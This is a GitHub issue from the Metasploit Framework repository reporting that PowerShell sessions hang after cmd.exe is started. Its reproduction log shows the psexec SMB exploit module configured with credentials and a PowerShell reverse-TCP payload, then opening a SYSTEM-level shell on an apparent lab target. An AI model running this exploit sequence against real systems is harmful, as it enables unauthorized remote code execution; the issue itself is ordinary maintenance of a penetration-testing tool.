rapid7 / metasploit-framework

Metasploit Framework
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Powershell sessions become unresponsive after starting cmd.exe #18001

Open zeroSteiner opened 1 year ago

zeroSteiner commented 1 year ago

Powershell sessions stop working if you start cmd.exe (or another process that provides it's own interactive shell, such as nslookup). I believe it has to do with the fact that the IO streams aren't closely tied and instead the Powershell payload is effectively just a REPL.

Steps to reproduce

msf6 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               Password1!       no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               smcintyre        no        The username to authenticate as

Payload options (windows/x64/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   EXITFUNC      thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST  yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 
[*] - Connecting to the server...
[*] - Authenticating to as user 'smcintyre'...
[*] - Selecting PowerShell target
[*] - Executing the payload...
[+] - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 2 opened ( -> at 2023-05-16 14:16:49 -0400

PS C:\Windows\system32> pwd


PS C:\Windows\system32> whoami  
nt authority\system
PS C:\Windows\system32> cmd.exe
Abort session 2? [y/N]  y

[*] - Powershell session session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) >
github-actions[bot] commented 1 year ago


This issue has been left open with no activity for a while now.

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